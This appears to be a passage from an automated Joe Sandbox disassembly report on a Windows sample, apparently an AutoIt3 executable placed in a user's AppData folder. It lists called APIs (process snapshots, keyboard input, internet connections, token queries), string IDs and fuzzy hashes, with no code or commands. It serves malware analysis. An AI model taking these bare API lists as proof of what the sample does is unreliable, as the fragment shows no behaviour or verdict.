                                                                                          • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                          • Instruction Fuzzy Hash: 3731193660C6C1C6E770EF16B448A5AB7A1F7887A0F504625EAE913BA9DB3DD481CF10
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                          • String ID: %lu
                                                                                          • API String ID: 2507767853-685833217
                                                                                          • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                          • Instruction ID: 28d7297f1da6517e6c8a2fba1deeb5235b4dd7defcf021ec9101417bc5db85dc
                                                                                          • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                          • Instruction Fuzzy Hash: F6313A7260CB86C6DB10FB16E4802ADB7A1FB89BC0F804435EA8D47B65EF78D595C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                          • String ID: msctls_trackbar32
                                                                                          • API String ID: 1025951953-1010561917
                                                                                          • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                          • Instruction ID: f066e3482e327e7183b64f667e39acc72e60306169695fb86e446dd2149efa03
                                                                                          • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                          • Instruction Fuzzy Hash: 1F310972A1C685C7E760AF15E458B5AB7A1FB88790F504235DBA803B58DF38D845CF14
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                          • String ID: %s%d
                                                                                          • API String ID: 2330185562-1110647743
                                                                                          • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                          • Instruction ID: 79e4155b38dd38280040318ad9c61b9a44d65af2c0069e7d1ecc4df2966aa821
                                                                                          • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                          • Instruction Fuzzy Hash: 42216161B0CB86D1EA14FB16E5442FAA362EB89BC0F944176DEDD07775EE2CE105C720
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                          • String ID: csm
                                                                                          • API String ID: 2280078643-1018135373
                                                                                          • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                          • Instruction ID: 912c51abd1900c341b2ffad44eaaec53d0319fb0ac69d0f61969cdc56bf9df92
                                                                                          • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                          • Instruction Fuzzy Hash: EA21093660C641C2E630EF16A45026EB7A1FB85BA5F810625DEDD037A5DF3CE886CB14
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                          • String ID: 0
                                                                                          • API String ID: 33631002-4108050209
                                                                                          • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                          • Instruction ID: 681fab5c614a24a448819d2f1a58b3f17ded8a7ca7962a5356d4d98c5b7f1fb2
                                                                                          • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                          • Instruction Fuzzy Hash: FA21913661CB80C6D3209F21E48469AB7B4F389794F54422AEBDD03B98DF3CC655CB10
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D092DD1), ref: 00007FF74D0CAF37
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D092DD1), ref: 00007FF74D0CAF4F
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                          • API String ID: 2574300362-1816364905
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                          • API String ID: 2574300362-3689287502
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                          • API String ID: 2574300362-4033151799
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                          • API String ID: 2574300362-199464113
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                          • API String ID: 2574300362-192647395
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          Similarity
                                                                                          • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                          • String ID:
                                                                                          • API String ID: 1249313431-0
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 2267087916-0
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$socket
                                                                                          • String ID:
                                                                                          • API String ID: 1881357543-0
                                                                                          Similarity
                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 3321077145-0
                                                                                          • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                          • Instruction ID: 4243c87ab8eccec8398791965914eed00cc0ae1e7f38bcd07ca49f57a5908d5f
                                                                                          • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                          • Instruction Fuzzy Hash: 7341B766A0CB46C2DB14FF27D59516DA760FB88FD4B889432DE8E47776EE38E4408360
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Similarity
                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1352109105-0
                                                                                          • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                          • Instruction ID: 164c0ff459b2d1254e6d59f5ff98151a4ca768a73753f46b4fd89bb32726e1ba
                                                                                          • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                          • Instruction Fuzzy Hash: 7A419536A0DA8AC5EA10BF15D894279BBB1BB44B54F958137DEAD43770FF38E4418710
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                          • String ID:
                                                                                          • API String ID: 3076010158-0
                                                                                          • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                          • Instruction ID: 1a5856a9c29abadcbe718cd95b09ee4f1e6efa42a6beeabb797a49c011a7d644
                                                                                          • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                          • Instruction Fuzzy Hash: E641CC32B0CA45C6EB10EF62D4502AD77A5FB84BA4F944036CE9D13764DF38E842C760
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 4141327611-0
                                                                                          • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                          • Instruction ID: d327283470226386a84ce97179b7eba57c7eed55d11296d3d76d8b37f639ad38
                                                                                          • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                          • Instruction Fuzzy Hash: 83418432B0C782C6FB61BB919154379EA90EF84B90FA44131DAC947AE5FF3CE8418725
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 1083639309-0
                                                                                          • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                          • Instruction ID: 6ad3df55358150f097150c6ca7be24303feb96a033e39c13dc662a52a05ba939
                                                                                          • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                          • Instruction Fuzzy Hash: A2415122A1CA82D6E710FB62E4545AEA3A4FB94B84F944036EE8D07765EF7CE505C720
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                          • String ID:
                                                                                          • API String ID: 432972143-0
                                                                                          • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                          • Instruction ID: 7eb8374c627dda871c59dd1900fada17c1fbab7b919e4aaa2d95f9c3e594c668
                                                                                          • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                          • Instruction Fuzzy Hash: 254118A1A1D682C1F730BB2194147B9A6A0FB64B90F950532EADA137F5EE3CD485CB70
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                                          • String ID:
                                                                                          • API String ID: 3340791633-0
                                                                                          • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                          • Instruction ID: d1c092372001f0036679480f54746def306b4ec65e6bfbe7cf8ff9255c7c5d69
                                                                                          • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                          • Instruction Fuzzy Hash: 8B419231E0C546C5FB64BB14D4243B8E760EB88B94F985137DAAD436F1EE7CE8818728
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                          • String ID:
                                                                                          • API String ID: 432972143-0
                                                                                          • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                          • Instruction ID: 57df0ff52c337ed57f42d016e29a346b0f762015ae4e1501fee429c435ae9c45
                                                                                          • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                          • Instruction Fuzzy Hash: 8B31F521E0C681C6E730BB2194047B9ABA0FB78B50F950235DAD9037A5EE3CD951C730
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1463438336-0
                                                                                          • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                          • Instruction ID: 4454b826c1173f5be9cd1878754adf8b8421e43a2efffd9d985ef027687684d9
                                                                                          • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                          • Instruction Fuzzy Hash: 10319032A0CB46C2E724FB56E054779E361FB49B94F484136DA8E07B68EF2CE0548B60
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF74D06A27B,?,?,?,00007FF74D06A236), ref: 00007FF74D073DB1
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF74D06A27B,?,?,?,00007FF74D06A236), ref: 00007FF74D073E13
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF74D06A27B,?,?,?,00007FF74D06A236), ref: 00007FF74D073E4D
                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF74D06A27B,?,?,?,00007FF74D06A236), ref: 00007FF74D073E77
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                          • String ID:
                                                                                          • API String ID: 1557788787-0
                                                                                          • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                          • Instruction ID: cb0567a78346d3430e9d7190725b4ffa3b7c516559f39ff8214f2c0811f3ddbb
                                                                                          • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                          • Instruction Fuzzy Hash: 19217C21F1C791C1EA20BF12A444039F6A5AB98FD0F884534DAEE27BE4EF3CE4528310
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID:
                                                                                          • API String ID: 847901565-0
                                                                                          • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                          • Instruction ID: 6075b8b28fb879a4c14d07318b427741b45a7320de85633e046fce73b649662f
                                                                                          • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                          • Instruction Fuzzy Hash: D221D321E0CB86C5EA14BB25A894339B651AF85BA0F954336EDAD07BE4EF7CE441C710
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2864067406-0
                                                                                          • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                          • Instruction ID: 16bbf9e68f35d8ab9f60b61e2f622b90a8f5ce63ef79b3bf5b60e60af5caf4fb
                                                                                          • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                          • Instruction Fuzzy Hash: 09314425A0CA49C5E710FB15E4543B9A7A0FB88F94F944232DA8D43BB4EF7CD545C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                          • String ID: cdecl
                                                                                          • API String ID: 4031866154-3896280584
                                                                                          • Opcode ID: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                                                          • Instruction ID: 8916a069ae12b1877a5e6ae48341e691c65f8e1a5a2eaf10d78d494ed2dfd8bc
                                                                                          • Opcode Fuzzy Hash: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                                                          • Instruction Fuzzy Hash: 5321AD2160C742C5EA10BF16A858278B3A1FF98FD0B894234EB9E477A1EF7CE450C324
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                          • String ID:
                                                                                          • API String ID: 837644225-0
                                                                                          • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                          • Instruction ID: 7ad11d243a6ff134cf4b4960a1e99f815e6c4375e66119e70602eb43f13b8ed9
                                                                                          • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                          • Instruction Fuzzy Hash: 9721A072A1CA41C6EB04EF21D408768E3A6FB89B95F854539DA9D03764EF3CD942C720
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF74D032A54: GetWindowLongPtrW.USER32 ref: 00007FF74D032A71
                                                                                          • GetClientRect.USER32(?,?,?,?,?,00007FF74D07AA36,?,?,?,?,?,?,?,?,?,00007FF74D0327AF), ref: 00007FF74D0E22C4
                                                                                          • GetCursorPos.USER32(?,?,?,?,?,00007FF74D07AA36,?,?,?,?,?,?,?,?,?,00007FF74D0327AF), ref: 00007FF74D0E22CF
                                                                                          • ScreenToClient.USER32 ref: 00007FF74D0E22DD
                                                                                          • DefDlgProcW.USER32(?,?,?,?,?,00007FF74D07AA36,?,?,?,?,?,?,?,?,?,00007FF74D0327AF), ref: 00007FF74D0E231F
                                                                                            • Part of subcall function 00007FF74D0DE894: LoadCursorW.USER32 ref: 00007FF74D0DE945
                                                                                          Similarity
                                                                                          • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1626762757-0
                                                                                          • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                          • Instruction ID: 5257abc7ddb8f0df6e5de604aba2c8156b55acf9ffa0566c8cfc610bfe0e424f
                                                                                          • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                          • Instruction Fuzzy Hash: E7213E22A0C64AC6EA24FB15F494569B361FB88F84F940531EBCD47B65EF3CE941CB10
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3970641297-0
                                                                                          • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                          • Instruction ID: b5b3a954b2d3386c316a9c307ae0cf158dc2a001aacbd4efae11ae4b3fe1ac24
                                                                                          • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                          • Instruction Fuzzy Hash: 39211B72A0D7C5CAE764EB15E4487AAB7A0FB89780F840135DA8D43B64EB7CD4948B00
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2979156933-0
                                                                                          • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                          • Instruction ID: 097b0fe4170198256d1b67e548677741378f8bafd79084c0f61e70f045fcf08f
                                                                                          • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                          • Instruction Fuzzy Hash: 6A219532B0C686C6E710AB16B84426AF691BB88BD4F858235E9D943765EF7CD1058760
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _ctrlfp
                                                                                          • String ID:
                                                                                          • API String ID: 697997973-0
                                                                                          • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                          • Instruction ID: 02158e14841a680d9439bfa169ab13abd0d4629803c9841b9f0dc7efe956e2b2
                                                                                          • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                          • Instruction Fuzzy Hash: 1411F621E0C542C2E611BA78915107FE671EF9B790FA84231FBC94BAB9EE2DE4418A40
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 357397906-0
                                                                                          • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                          • Instruction ID: e89f3af091b5acf7a8074d2c17d2491723eba7e514810e8c4644625265c8a57e
                                                                                          • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                          • Instruction Fuzzy Hash: 6A21C7B6E08B45DEEB00EF74D85869C77B1F748B48B404C26EB5893B28EB78D654CB50
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                                          • String ID:
                                                                                          • API String ID: 1352324309-0
                                                                                          • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                          • Instruction ID: 328baf36ccf2a400fc4e67caaa85ad8f466710e6607bf20576959fd6487a11dc
                                                                                          • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                          • Instruction Fuzzy Hash: 2211547671C542C2E720BF25E488369A3A0FB88B88FD44136C68D4BA64EF7CD544CB70
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$abort
                                                                                          • String ID:
                                                                                          • API String ID: 1447195878-0
                                                                                          • Opcode ID: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                                          • Instruction ID: c8c5e511ace911e72a3beb3f58cc107ac248a4792151d782a6f4fcd4f0f6dca0
                                                                                          • Opcode Fuzzy Hash: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                                          • Instruction Fuzzy Hash: 1F0169A4F0D646C2EA58B7B1A55A27C92515F48B90FD41938D99E077F6FE2CE8014220
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                          • String ID:
                                                                                          • API String ID: 2875609808-0
                                                                                          • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                          • Instruction ID: 9966d1e7a898a0d07ccb4eb0d4a9fe86117a9c1d8ca5e990e79e67d03f60f266
                                                                                          • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                          • Instruction Fuzzy Hash: 5D01C410B0CB86C2EA167775A04927EF360AFAA741FC40335E9CB22670EF28E4958720
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                          • String ID:
                                                                                          • API String ID: 1539411459-0
                                                                                          • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                          • Instruction ID: 03ffdd2418f82d1dfe0ee481b41095a95274bb4c9ca2cd915dbf8fcad37761c1
                                                                                          • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                          • Instruction Fuzzy Hash: BD019235B1C691C2E704BB15B80D729EB60BB85B94F980574DED903BB1EF7DD4418B10
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3974789173-0
                                                                                          • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                          • Instruction ID: 1bd94480d9c4e16b4b1d3cc841294a3001cd0623c3c6dc2bed4a23eaa80ff7cf
                                                                                          • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                          • Instruction Fuzzy Hash: E4F03061A5D506C2EB507F61E80C76863A0AF59BD5FC84434C94E83664FE7CD999C320
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                          • Instruction ID: cbace1b3d860c9e140dc8c0f5e12d7b51b4cb085a67c421dd131c2a2485ae096
                                                                                          • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                          • Instruction Fuzzy Hash: D1E01A20A0D716CAFA00BB72A82C338A265AF8DFC1F804831CD4E07B75FE3CA0059710
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                          • Instruction ID: 8e78f8f69ef31cfa4f684bbfd6f8c1069896875206730b3a00a4ae0ea6190602
                                                                                          • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                          • Instruction Fuzzy Hash: F7E01220A0D716CAEA00FB72A82C238A2A4AB8DFC1F800831CD4E03B71EE3DA0059710
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: gfffffff
                                                                                          • API String ID: 3215553584-1523873471
                                                                                          • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                          • Instruction ID: 31438290a1cd01b7352f1f1d1404978699b222e3219da365c83ca42cfc412139
                                                                                          • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                          • Instruction Fuzzy Hash: EE912862B0D78AC6EB21BF6691403B8AFA5AB257D0F448131DBCD073A5EE3DE551C321
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ContainedObject
                                                                                          • String ID: AutoIt3GUI$Container
                                                                                          • API String ID: 3565006973-3941886329
                                                                                          • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                          • Instruction ID: 630d6d723aa4ffba578e6cfa468e1d6ee360db4043069a5b92060a102891b5ef
                                                                                          • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                          • Instruction Fuzzy Hash: 7F913836608B86C5DB24EF2AE4502ADB3A5FB88B84F918036DF8D43764EF79D445C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: e+000$gfff
                                                                                          • API String ID: 3215553584-3030954782
                                                                                          • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                          • Instruction ID: 0713f7647856f7b2a7666b5a7989dab99e4cef55b830c5267e4915677cc5ba13
                                                                                          • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                          • Instruction Fuzzy Hash: 1E513D62B1C7C2D6E725AF759940369AB91EB91B90F888231C7DC4BBE5EE2CD040C720
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                          • String ID: C:\Users\user\AppData\Roaming\BFmcYQ.exe
                                                                                          • API String ID: 3307058713-1120059523
                                                                                          • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                          • Instruction ID: 508a32f9d9c40dab3fb82b672ad23045f882428f431d8e743499473457505a39
                                                                                          • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                          • Instruction Fuzzy Hash: 5F418172B0CA56C9EB14FF61A8400BDA7A5FF44B90B954032ED8E4BB65FE3CE4518720
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                          • String ID: static
                                                                                          • API String ID: 3467290483-2160076837
                                                                                          • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                          • Instruction ID: 88deef75a177169921721b19178a4546e54e7cf3fae776834681a20431ffc74f
                                                                                          • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                          • Instruction Fuzzy Hash: 24411B3260C6C2C6D670AF25F4547AEB7A1FB85791F504235EBE903AA9EB3CD481CB50
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                          • String ID: 255.255.255.255
                                                                                          • API String ID: 2496851823-2422070025
                                                                                          • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
